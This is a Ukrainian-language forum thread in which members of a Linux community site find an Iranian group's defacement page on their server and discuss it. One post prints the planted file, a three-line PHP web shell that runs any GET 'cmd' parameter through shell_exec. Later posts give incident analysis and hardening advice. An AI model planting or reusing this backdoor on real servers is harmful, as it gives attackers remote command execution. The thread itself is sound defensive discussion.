Привіт з Тегерану

[cadca]

Оце випадково надибав сторінку на сайті:

Creating dir /var/www/tmp/ Can't create /var/www/tmp/, let's try /tmp/

How Can You Hire Somebody That Doesnt Know How 2 Setup a Public Server?

This Site Hacked by Behrooz_Ice - Q7x - ActionSpider



Ashiyane Security Team Members

Special Thanks to Ashiyane Programers & Ashiyane Defacers Team

We Love IRan

, про яку Google знає від 6 вер. 2007 15:16:13 GMT. А адміністратор/модератори про наявність такої сторінки знають?

[Cthulhu]

М-дя. Чому я не здивований...

В мене ніяких прав це лікувати нема. На фоні інших проблем це виглядає, м'яко кажучи, не найбільшим лихом. Тому скористаюсь, так би мовити, нагодою... але відразу в іншій гілці.

[Володимир Лісівка]

Ні, не знають. :-(

[Михайло Даниленко]

Отака штукенція .

Код: [Вибрати]

[isbear@squirrel isbear]$ cat linux.org.ua/htdocs/novyny/..php
Creating dir /var/www/tmp/
Can't create /var/www/tmp/, let's try /tmp/
<?
$cmd=$_GET['cmd'];
$executing=shell_exec("$cmd");
echo "<center><textarea rows='30' cols='85' > $executing </textarea></center>";
[isbear@squirrel isbear]$

[gvy]

Можливо, це був старий прецедент з awstats (ні -- то 2005-01-27) чи bigsam, судячи з дати файлу (2005-09-17).  По логах з літа 2007 по сьогодні спроб скористатися тим шелом, який працював два роки, не було.

Майбутньому адміністратору: краще відслідковувати bugtraq/secunia та бути підписаним на анонси використовуваного веб-ПЗ.  Володі принаймні у випадку з awstats я аж надто довіряв -- чужі дірки краще теж на усілякий chmod 0, а потім вже повідомлювати та розбиратися.  Бо така зайва довіра може бути й важкою.

PS: якщо треба підтримувати старий архів (а це взагалі добре) -- краще збекапити та поновити того bugsam'а.